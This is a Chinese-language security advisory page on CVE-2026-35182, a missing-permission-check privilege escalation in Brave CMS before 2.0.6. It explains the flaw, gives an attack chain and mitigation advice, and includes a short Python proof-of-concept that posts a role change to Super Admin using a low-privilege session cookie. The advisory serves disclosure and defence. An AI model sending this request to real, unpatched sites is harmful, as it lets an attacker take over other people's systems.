IPBUF安全漏洞报告
English
CVE-2026-35182 CVSS 8.8 高危

CVE-2026-35182 Brave CMS权限提升漏洞

披露日期: 2026-04-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35182
漏洞类型
权限提升
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Brave CMS

相关标签

权限提升越权漏洞Brave CMSWeb安全CVE-2026-35182IDOR

漏洞概述

Brave CMS是一款开源内容管理系统。在2.0.6之前的版本中,系统存在严重的权限验证缺失漏洞。具体表现为在routes/web.php定义的更新角色端点/rights/update-role/{id}未调用checkUserPermissions中间件。这使得任何已登录的低权限用户均可绕过权限限制,直接发起请求修改任意账户角色,从而将自己提升为超级管理员,完全接管系统控制权。官方已在2.0.6版本中修复了此问题。

技术细节

该漏洞的根源在于Brave CMS后端路由配置不当,属于典型的越权漏洞。在受影响版本的routes/web.php文件中,负责处理用户角色更新的POST路由/rights/update-role/{id}未正确配置访问控制。按照安全开发规范,此类敏感操作应绑定checkUserPermissions:assign-user-roles中间件以确保只有授权管理员可操作。然而,由于该中间件的缺失,系统仅校验了请求者的Session状态(即是否登录),未校验其具体权限。攻击者利用此缺陷,只需获取一个普通低权限账户的登录凭证,即可通过Burp Suite等工具拦截并修改请求,或直接构造恶意POST数据包,将参数id指向自身或目标用户,并将角色参数修改为Super Admin对应的ID。服务器接收请求后直接执行数据库更新操作,导致攻击者瞬间获得系统最高权限。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标系统使用的是Brave CMS,且版本低于2.0.6。
STEP 2
2. 获取低权限账号
攻击者在目标网站上注册一个普通用户账号,或获取一个已认证的低权限用户凭证。
STEP 3
3. 发送恶意请求
攻击者使用该账号的Cookie,向/rights/update-role/{id}端点发送POST请求,将id参数设为自身ID,role_id设为Super Admin对应的ID。
STEP 4
4. 权限提升
服务器因缺少权限校验,直接处理请求并修改数据库。攻击者刷新页面后获得超级管理员权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://example.com/rights/update-role/{user_id}" attacker_session_cookie = "laravel_session=..." # Payload configuration: Assuming '1' is the ID for Super Admin role # Replace {user_id} with the attacker's own user ID or target user ID exploit_url = target_url.replace("{user_id}", "2") payload = { "role_id": "1", # "_token": "..." // Include CSRF token if required by framework config } headers = { "Cookie": attacker_session_cookie, "Content-Type": "application/x-www-form-urlencoded" } # Send exploit request response = requests.post(exploit_url, data=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! User role updated to Super Admin.") else: print("[-] Exploit failed. Status code:", response.status_code)

影响范围

Brave CMS < 2.0.6

防御指南

临时缓解措施
建议立即升级至Brave CMS 2.0.6或更高版本以修复权限验证缺失问题。若无法立即升级,请手动在routes/web.php文件中,为/rights/update-role/{id}路由添加checkUserPermissions:assign-user-roles中间件,确保只有具备权限的管理员才能访问该接口。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表